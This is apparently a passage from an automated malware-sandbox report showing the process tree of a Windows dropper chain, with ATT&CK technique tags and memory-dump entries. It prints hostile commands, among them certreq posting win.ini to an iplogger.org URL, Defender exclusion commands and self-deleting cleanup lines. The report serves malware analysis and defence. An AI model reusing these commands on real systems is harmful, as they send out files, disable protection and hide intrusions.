        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 /prefetch:8
        17⤵
        
        PID:6808
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5580 /prefetch:8
        17⤵
        
        PID:4188
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5444 /prefetch:8
        17⤵
        
        PID:4764
        
        C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
        17⤵
        
        PID:8596
        
        C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff75f747740,0x7ff75f747750,0x7ff75f747760
        18⤵
        
        PID:8652
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5272 /prefetch:8
        17⤵
        
        PID:8588
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5124 /prefetch:8
        17⤵
        
        PID:8668
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:8
        17⤵
        
        PID:8740
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4980 /prefetch:8
        17⤵
        
        PID:8808
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1540 /prefetch:8
        17⤵
        
        PID:8980
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=840 /prefetch:8
        17⤵
        
        PID:9036
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5188 /prefetch:8
        17⤵
        
        PID:9064
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3756 /prefetch:8
        17⤵
        
        PID:9164
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4856 /prefetch:8
        17⤵
        
        PID:7032
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5360 /prefetch:8
        17⤵
        
        PID:7008
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4916 /prefetch:8
        17⤵
        
        PID:3292
        
        C:\Windows\regedit.exe
        
        regedit /s chrome-set.reg
        13⤵
        Runs .reg file with regedit
        
        PID:6596
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
        
        parse.exe -f json -b firefox
        13⤵
        
        PID:6480
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
        
        parse.exe -f json -b chrome
        13⤵
        
        PID:7832
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
        
        parse.exe -f json -b edge
        13⤵
        
        PID:7904
        
        C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\PictureLAb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\PictureLAb.exe" /Verysilent
        9⤵
        
        PID:4752
        
        C:\Users\Admin\AppData\Local\Temp\is-453OA.tmp\PictureLAb.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-453OA.tmp\PictureLAb.tmp" /SL5="$204A4,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\PictureLAb.exe" /Verysilent
        10⤵
        
        PID:5508
        
        C:\Users\Admin\AppData\Local\Temp\is-H1PBM.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-H1PBM.tmp\Setup.exe" /VERYSILENT
        11⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\is-2RU90.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2RU90.tmp\Setup.tmp" /SL5="$20552,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-H1PBM.tmp\Setup.exe" /VERYSILENT
        12⤵
        
        PID:3200
        
        C:\Users\Admin\AppData\Local\Temp\is-JVNLE.tmp\kkkk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-JVNLE.tmp\kkkk.exe" /S /UID=lab214
        13⤵
        
        PID:7024
        
        C:\Program Files\Windows Portable Devices\XHCUGOIADB\prolab.exe
        
        "C:\Program Files\Windows Portable Devices\XHCUGOIADB\prolab.exe" /VERYSILENT
        14⤵
        
        PID:5416
        
        C:\Users\Admin\AppData\Local\Temp\is-BCVT8.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BCVT8.tmp\prolab.tmp" /SL5="$80058,575243,216576,C:\Program Files\Windows Portable Devices\XHCUGOIADB\prolab.exe" /VERYSILENT
        15⤵
        
        PID:6720
        
        C:\Users\Admin\AppData\Local\Temp\fd-4f291-23b-7138d-ee33127237762\Mymaeraelusha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fd-4f291-23b-7138d-ee33127237762\Mymaeraelusha.exe"
        14⤵
        
        PID:4592
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oitzteqy.po0\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:7816
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yn1xeq4t.rrn\privacytools5.exe & exit
        15⤵
        
        PID:4164
        
        C:\Users\Admin\AppData\Local\Temp\yn1xeq4t.rrn\privacytools5.exe
        
        C:\Users\Admin\AppData\Local\Temp\yn1xeq4t.rrn\privacytools5.exe
        16⤵
        
        PID:4052
        
        C:\Users\Admin\AppData\Local\Temp\yn1xeq4t.rrn\privacytools5.exe
        
        C:\Users\Admin\AppData\Local\Temp\yn1xeq4t.rrn\privacytools5.exe
        17⤵
        
        PID:7856
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\scbmdhod.nki\setup.exe /8-2222 & exit
        15⤵
        
        PID:7296
        
        C:\Users\Admin\AppData\Local\Temp\scbmdhod.nki\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\scbmdhod.nki\setup.exe /8-2222
        16⤵
        
        PID:7692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Winter-Silence"
        17⤵
        
        PID:8580
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\knvaywn3.kz2\MultitimerFour.exe & exit
        15⤵
        
        PID:7368
        
        C:\Users\Admin\AppData\Local\Temp\knvaywn3.kz2\MultitimerFour.exe
        
        C:\Users\Admin\AppData\Local\Temp\knvaywn3.kz2\MultitimerFour.exe
        16⤵
        
        PID:7676
        
        C:\Users\Admin\AppData\Local\Temp\9PF9AI9C2K\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9PF9AI9C2K\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:7968
        
        C:\Users\Admin\AppData\Local\Temp\9PF9AI9C2K\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9PF9AI9C2K\multitimer.exe" 1 3.1615014714.60432b3a1c73e 104
        18⤵
        
        PID:9104
        
        C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\Delta.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\Delta.exe" /Verysilent
        9⤵
        
        PID:7080
        
        C:\Users\Admin\AppData\Local\Temp\is-K28UO.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-K28UO.tmp\Delta.tmp" /SL5="$304B0,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\Delta.exe" /Verysilent
        10⤵
        
        PID:7096
        
        C:\Users\Admin\AppData\Local\Temp\is-V1D9H.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-V1D9H.tmp\Setup.exe" /VERYSILENT
        11⤵
        
        PID:6548
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-V1D9H.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
        12⤵
        
        PID:7516
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Setup.exe /f
        13⤵
        Kills process with taskkill
        
        PID:5496
        
        C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\zznote.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\zznote.exe" /Verysilent
        9⤵
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\is-HV76R.tmp\zznote.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HV76R.tmp\zznote.tmp" /SL5="$5050A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\zznote.exe" /Verysilent
        10⤵
        
        PID:4448
        
        C:\Users\Admin\AppData\Local\Temp\is-AR5D9.tmp\jg4_4jaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-AR5D9.tmp\jg4_4jaa.exe" /silent
        11⤵
        
        PID:8204
    - - C:\Users\Admin\AppData\Local\Temp\yi0zmfkvuqw\safebits.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yi0zmfkvuqw\safebits.exe" /S /pubid=1 /subid=451
        5⤵
        Executes dropped EXE
        
        PID:1332
    - - C:\Users\Admin\AppData\Local\Temp\rpmol1xmar0\1nwdsdrt3mu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rpmol1xmar0\1nwdsdrt3mu.exe" 57a764d042bf8
        5⤵
        Executes dropped EXE
        
        PID:808
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k "C:\Program Files\GY2FU07HUF\GY2FU07HU.exe" 57a764d042bf8 & exit
        6⤵
        
        PID:4608
        
        C:\Program Files\GY2FU07HUF\GY2FU07HU.exe
        
        "C:\Program Files\GY2FU07HUF\GY2FU07HU.exe" 57a764d042bf8
        7⤵
        
        PID:1104
    - - C:\Users\Admin\AppData\Local\Temp\e5anovlm0jq\chashepro3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e5anovlm0jq\chashepro3.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        
        PID:3296
      - C:\Users\Admin\AppData\Local\Temp\is-83IHB.tmp\chashepro3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-83IHB.tmp\chashepro3.tmp" /SL5="$50148,2015144,58368,C:\Users\Admin\AppData\Local\Temp\e5anovlm0jq\chashepro3.exe" /VERYSILENT
        6⤵
        
        PID:4108
    - - C:\Users\Admin\AppData\Local\Temp\zppgwb3bb0i\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zppgwb3bb0i\app.exe" /8-23
        5⤵
        
        PID:4632
      - C:\Program Files (x86)\Dawn-Darkness\7za.exe
        
        "C:\Program Files (x86)\Dawn-Darkness\7za.exe" e -p154.61.71.13 winamp-plugins.7z
        6⤵
        
        PID:5340
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Dawn-Darkness\app.exe" -map "C:\Program Files (x86)\Dawn-Darkness\WinmonProcessMonitor.sys""
        6⤵
        
        PID:6844
        
        C:\Program Files (x86)\Dawn-Darkness\app.exe
        
        "C:\Program Files (x86)\Dawn-Darkness\app.exe" -map "C:\Program Files (x86)\Dawn-Darkness\WinmonProcessMonitor.sys"
        7⤵
        
        PID:7012
      - C:\Program Files (x86)\Dawn-Darkness\7za.exe
        
        "C:\Program Files (x86)\Dawn-Darkness\7za.exe" e -p154.61.71.13 winamp.7z
        6⤵
        
        PID:5564
      - C:\Program Files (x86)\Dawn-Darkness\app.exe
        
        "C:\Program Files (x86)\Dawn-Darkness\app.exe" /8-23
        6⤵
        
        PID:6612
    - - C:\Users\Admin\AppData\Local\Temp\zubxkghzrd3\3fzxlwbxjhl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zubxkghzrd3\3fzxlwbxjhl.exe" /ustwo INSTALL
        5⤵
        
        PID:488
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 656
        6⤵
        Program crash
        
        PID:5372
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 672
        6⤵
        Program crash
        
        PID:5580
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 752
        6⤵
        Program crash
        
        PID:5704
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 808
        6⤵
        Program crash
        
        PID:6088
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 876
        6⤵
        Program crash
        
        PID:5524
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 924
        6⤵
        Program crash
        
        PID:1956
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 1088
        6⤵
        Program crash
        
        PID:4120
    - - C:\Users\Admin\AppData\Local\Temp\tz0opdadjis\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tz0opdadjis\vpn.exe" /silent /subid=482
        5⤵
        Executes dropped EXE
        
        PID:3624
    - - C:\Users\Admin\AppData\Local\Temp\31gzd0lwhav\gi3tpwy1sjt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\31gzd0lwhav\gi3tpwy1sjt.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:720
    - - C:\Users\Admin\AppData\Local\Temp\trtxm4pbwex\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\trtxm4pbwex\askinstall24.exe"
        5⤵
        Executes dropped EXE
        
        PID:2904
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:4832
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:5516

C:\Users\Admin\AppData\Local\Temp\is-445R3.tmp\gi3tpwy1sjt.tmp
"C:\Users\Admin\AppData\Local\Temp\is-445R3.tmp\gi3tpwy1sjt.tmp" /SL5="$401DA,870426,780800,C:\Users\Admin\AppData\Local\Temp\31gzd0lwhav\gi3tpwy1sjt.exe" /VERYSILENT
1⤵
- Executes dropped EXE
PID:1504
- C:\Users\Admin\AppData\Local\Temp\is-FT504.tmp\winlthst.exe
  "C:\Users\Admin\AppData\Local\Temp\is-FT504.tmp\winlthst.exe" test1 test1
  2⤵
  PID:4528
- - C:\Users\Admin\AppData\Local\Temp\2rBPJ2wf0.exe
    "C:\Users\Admin\AppData\Local\Temp\2rBPJ2wf0.exe"
    3⤵
    PID:5864
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im 2rBPJ2wf0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2rBPJ2wf0.exe" & del C:\ProgramData\*.dll & exit
      4⤵
      PID:6392
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im 2rBPJ2wf0.exe /f
        5⤵
        Kills process with taskkill
        
        PID:6668
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        5⤵
        Delays execution with timeout.exe
        
        PID:6960

C:\Users\Admin\AppData\Local\Temp\is-AR8P3.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AR8P3.tmp\vpn.tmp" /SL5="$10274,15170975,270336,C:\Users\Admin\AppData\Local\Temp\tz0opdadjis\vpn.exe" /silent /subid=482
1⤵
PID:4124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
  2⤵
  PID:696
- - C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
    tapinstall.exe remove tap0901
    3⤵
    PID:5764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
  2⤵
  PID:1856
- - C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
    tapinstall.exe install OemVista.inf tap0901
    3⤵
    PID:5976
- C:\Program Files (x86)\MaskVPN\mask_svc.exe
  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
  2⤵
  PID:4948
- C:\Program Files (x86)\MaskVPN\mask_svc.exe
  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
  2⤵
  PID:8368

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
1⤵
PID:4352
- C:\Windows\SysWOW64\certreq.exe
  certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
  2⤵
  PID:4372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
1⤵
PID:4428

C:\Program Files (x86)\JCleaner\Abbas.exe
"C:\Program Files (x86)\JCleaner\Abbas.exe"
1⤵
PID:4464

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
1⤵
PID:4580
- C:\Windows\SysWOW64\certreq.exe
  certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
  2⤵
  PID:4192

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
1⤵
PID:4732

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Dawn-Darkness"
1⤵
PID:4288

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo grYNxrw
1⤵
PID:1576

C:\Program Files (x86)\JCleaner\8.exe
"C:\Program Files (x86)\JCleaner\8.exe"
1⤵
PID:4804
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
  2⤵
  PID:1252
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    PID:5356

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
1⤵
PID:4648

C:\Users\Admin\AppData\Local\Temp\is-45NGH.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-45NGH.tmp\wimapi.exe" 535
1⤵
PID:4512
- C:\Users\Admin\AppData\Local\Temp\ui2KdguXQ.exe
  "C:\Users\Admin\AppData\Local\Temp\ui2KdguXQ.exe"
  2⤵
  PID:2284
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im ui2KdguXQ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ui2KdguXQ.exe" & del C:\ProgramData\*.dll & exit
    3⤵
    PID:6492
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im ui2KdguXQ.exe /f
      4⤵
      Kills process with taskkill
      PID:6736
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:6992

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
1⤵
PID:4504
- C:\Program Files (x86)\JCleaner\Venita.exe
  "{path}"
  2⤵
  PID:6852

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
1⤵
PID:4384

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5732

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5896

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5916
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 5916 -s 1504
  2⤵
  - Program crash
  PID:1400

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6080

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1308

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4300

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5608

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6420

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:6980
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{088e8c02-b13e-5645-9422-427281a7cb3a}\oemvista.inf" "9" "4d14a44ff" "000000000000017C" "WinSta0\Default" "0000000000000180" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:3184
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000017C"
  2⤵
  PID:6616

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:7064

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:7072

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/8-2-0x00007FFE6E030000-0x00007FFE6EA1C000-memory.dmp

Filesize
9.9MB

Download
memory/8-9-0x000000001AFC0000-0x000000001AFC2000-memory.dmp

Filesize
8KB

Download
memory/8-3-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/416-87-0x00000000020A1000-0x00000000020CC000-memory.dmp

Filesize
172KB

Download
memory/416-103-0x0000000005020000-0x0000000005021000-memory.dmp

Filesize
4KB

Download
memory/416-105-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download
memory/416-170-0x0000000003AB0000-0x0000000003AB1000-memory.dmp

Filesize
4KB

Download
memory/416-126-0x0000000005060000-0x0000000005061000-memory.dmp

Filesize
4KB

Download
memory/416-165-0x00000000050D0000-0x00000000050D1000-memory.dmp

Filesize
4KB

Download
memory/416-140-0x0000000005090000-0x0000000005091000-memory.dmp

Filesize
4KB

Download
memory/416-172-0x0000000003AC0000-0x0000000003AC1000-memory.dmp

Filesize
4KB

Download
memory/416-95-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/416-116-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/416-162-0x00000000050B0000-0x00000000050B1000-memory.dmp

Filesize
4KB

Download
memory/416-167-0x00000000050E0000-0x00000000050E1000-memory.dmp

Filesize
4KB

Download
memory/416-94-0x0000000005010000-0x0000000005011000-memory.dmp

Filesize
4KB

Download
memory/416-134-0x0000000005070000-0x0000000005071000-memory.dmp

Filesize
4KB

Download
memory/416-89-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/416-181-0x0000000003AD0000-0x0000000003AD1000-memory.dmp

Filesize
4KB

Download
memory/416-106-0x0000000005040000-0x0000000005041000-memory.dmp

Filesize
4KB

Download
memory/416-163-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/416-138-0x0000000005080000-0x0000000005081000-memory.dmp

Filesize
4KB

Download
memory/416-143-0x00000000050A0000-0x00000000050A1000-memory.dmp

Filesize
4KB

Download
